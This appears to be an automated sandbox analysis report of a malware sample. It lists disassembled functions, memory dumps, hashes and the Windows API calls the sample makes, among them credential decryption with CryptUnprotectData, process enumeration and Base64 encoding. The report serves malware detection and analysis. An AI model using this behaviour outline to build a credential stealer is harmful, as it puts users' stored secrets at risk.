                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "&M$Jo$P7%$&w9$fw
                                • API String ID: 0-4205341186
                                • Opcode ID: 9abe25e3ee480f930ce3ef9b2530d45934762ac32aad26c16d7215916158203c
                                • Instruction ID: 77adcdf18efe0b5c4d3a7a6f53b9c4c36f28f9d1026558ec23dbf3fbb5f981c2
                                • Opcode Fuzzy Hash: 9abe25e3ee480f930ce3ef9b2530d45934762ac32aad26c16d7215916158203c
                                • Instruction Fuzzy Hash: 54B23BF360C2049FE304AE2DEC8567ABBEAEFD4720F1A853DE6C4C7744E97558018696
                                Function 00A7D725 Relevance: 7.9, Strings: 5, Instructions: 1603COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ?pOo$ocW$yf~n$27$rw]
                                • API String ID: 0-3059391896
                                • Opcode ID: a1f223252b47f2756fde7bae9883c078557ceed98796ff60474bb5dc2bb75ef6
                                • Instruction ID: 2ea863b722b6e12378605f6783a4ad5cb29b802b6864d5d0b143dca0a9ce5526
                                • Opcode Fuzzy Hash: a1f223252b47f2756fde7bae9883c078557ceed98796ff60474bb5dc2bb75ef6
                                • Instruction Fuzzy Hash: 0AB207F3A082049FE3046E2DEC8567AFBEAEF94720F1A453DEAC4C3744E67558058697
                                Function 006C7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006C775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C7765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006C778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006C77AD
                                • LocalFree.KERNEL32(?), ref: 006C77B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: d8e40af82fa49334ba03e654f1de8c40df90ac28e7d159223a892dbab78b6a13
                                • Instruction ID: 4d37ef305383be49f59d58e9593be52d817bb5f02be0ab909076bcf563372fee
                                • Opcode Fuzzy Hash: d8e40af82fa49334ba03e654f1de8c40df90ac28e7d159223a892dbab78b6a13
                                • Instruction Fuzzy Hash: 2A011275B40308BFEB10DBA49C4AFBA7B79FB44B15F104155FA09EB2C0DAB0A900CB94
                                Function 00A78633 Relevance: 6.7, Strings: 4, Instructions: 1657COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: jU$N(?{$Q$y$TKo
                                • API String ID: 0-3309813427
                                • Opcode ID: 2c79d99f4ffa4324ff945e6818cfcc26c5919054fed3a076bb5304ea321902db
                                • Instruction ID: 3549faa2e81e49edfecc1a1ef72a94d2e6726e82f6e12170dc7c9afe5aa015ca
                                • Opcode Fuzzy Hash: 2c79d99f4ffa4324ff945e6818cfcc26c5919054fed3a076bb5304ea321902db
                                • Instruction Fuzzy Hash: B5B249F3A0C2149FE3046E2DEC85A7ABBE9EF94720F1A453DEAC4D3744E975580086D6
                                Function 00A71ADF Relevance: 6.6, Strings: 4, Instructions: 1591COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ,'~f$a~_$hwe|$qi+
                                • API String ID: 0-1193033150
                                • Opcode ID: 4f183c13b3d80b2fb163c1af81d3693e307bcd47714b71a7d2a829b7a6329c33
                                • Instruction ID: 2775d27b1782b9e822241c969366250e2ed6aa05231b3f3549eebcc0d48aa57f
                                • Opcode Fuzzy Hash: 4f183c13b3d80b2fb163c1af81d3693e307bcd47714b71a7d2a829b7a6329c33
                                • Instruction Fuzzy Hash: ABB23AF3A0C2049FE304AE2DEC8567AB7E9EFD4720F1A453DEAC4C7744EA3558058696
                                Function 00A6E46D Relevance: 6.6, Strings: 4, Instructions: 1570COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "=$$*]$Rcy$v>9o
                                • API String ID: 0-340277136
                                • Opcode ID: a6b33cc8f296d7574b4d1ed3edc6e1af12872174a2c3bac17d65df2f72c68ceb
                                • Instruction ID: 3080d686f45027ed990916eeb59e3f1c68a0db050657f57c82e5414c27f14d58
                                • Opcode Fuzzy Hash: a6b33cc8f296d7574b4d1ed3edc6e1af12872174a2c3bac17d65df2f72c68ceb
                                • Instruction Fuzzy Hash: 54B2F6F3A08200AFE314AE29DC8577ABBE9EF94720F16493DEAC5C7744E63558408797
                                Function 00A7F1D2 Relevance: 6.6, Strings: 4, Instructions: 1565COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 7g{_$V3y$i\9$HP
                                • API String ID: 0-284449329
                                • Opcode ID: 0f39269051592515183b3d2214780bd3ec7277a95756a42ce2a5a46be4f155b8
                                • Instruction ID: 315c2f7929837ce38cc57ff167e478aec8bd7a23515e71bb60570b3d8ca6f43d
                                • Opcode Fuzzy Hash: 0f39269051592515183b3d2214780bd3ec7277a95756a42ce2a5a46be4f155b8
                                • Instruction Fuzzy Hash: A8A217F3A082109FE304AE2DDC8567AFBE9EF94720F16893DE6C4C7744EA3558458693
                                Function 006E3A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006E71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006E71FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006E3A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 006E3AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E3ABF
                                  • Part of subcall function 006E7310: lstrlen.KERNEL32(------,006C5BEB), ref: 006E731B
                                  • Part of subcall function 006E7310: lstrcpy.KERNEL32(00000000), ref: 006E733F
                                  • Part of subcall function 006E7310: lstrcat.KERNEL32(?,------), ref: 006E7349
                                  • Part of subcall function 006E7280: lstrcpy.KERNEL32(00000000), ref: 006E72AE
                                • CloseHandle.KERNEL32(00000000), ref: 006E3BF7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 0bb543a4ea587bb340cf25b2c17e16027232b4aaaea984791a882a7d4ee5433c
                                • Instruction ID: 47083e41c95c9a899eafd6cb40df528fce3bc7d361268b6ec82e2b7ce78575f3
                                • Opcode Fuzzy Hash: 0bb543a4ea587bb340cf25b2c17e16027232b4aaaea984791a882a7d4ee5433c
                                • Instruction Fuzzy Hash: 4781E530902354CFC714CF2AD948BA5B7F2FB54329F29C1A9D4099B3A2D7769D86CB84
                                Function 006CEA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 006CEA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 006CEA7E
                                • lstrcat.KERNEL32(006ECFEC,006ECFEC), ref: 006CEB27
                                • lstrcat.KERNEL32(006ECFEC,006ECFEC), ref: 006CEB49
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: bcfb3d286becced1e7b5ad3061436fb746fb1fdbd28302d2f0e55b39db216d7d
                                • Instruction ID: b5d373e609a0da9337071f91bd7ea79547cfd879528d6ccb16d8af19ea9c96fd
                                • Opcode Fuzzy Hash: bcfb3d286becced1e7b5ad3061436fb746fb1fdbd28302d2f0e55b39db216d7d
                                • Instruction Fuzzy Hash: 6731D375B01219ABDB109BA9EC45FFEB77EEF84715F0041A9F909E3240DBB15A04CBA1
                                Function 006E40B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 006E40CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 006E40DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E40E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 006E4113
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: 72c7d6ae1f40bd6941a3a754f4cfd2606eaf881e31e6dc3439b51dd277d47461
                                • Instruction ID: b5a43b5e349029e198da86e4722f978467d47a6be643ac9c2abb0e2492364dc8
                                • Opcode Fuzzy Hash: 72c7d6ae1f40bd6941a3a754f4cfd2606eaf881e31e6dc3439b51dd277d47461
                                • Instruction Fuzzy Hash: A9011A70601205ABDB109FB5EC89FAABBAEEF85311F108169FE4987340DE719940CBA4
                                Function 006E2B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,006EA3D0,000000FF), ref: 006E2B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 006E2B96
                                • GetLocalTime.KERNEL32(?,?,00000000,006EA3D0,000000FF), ref: 006E2BA2
                                • wsprintfA.USER32 ref: 006E2BCE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
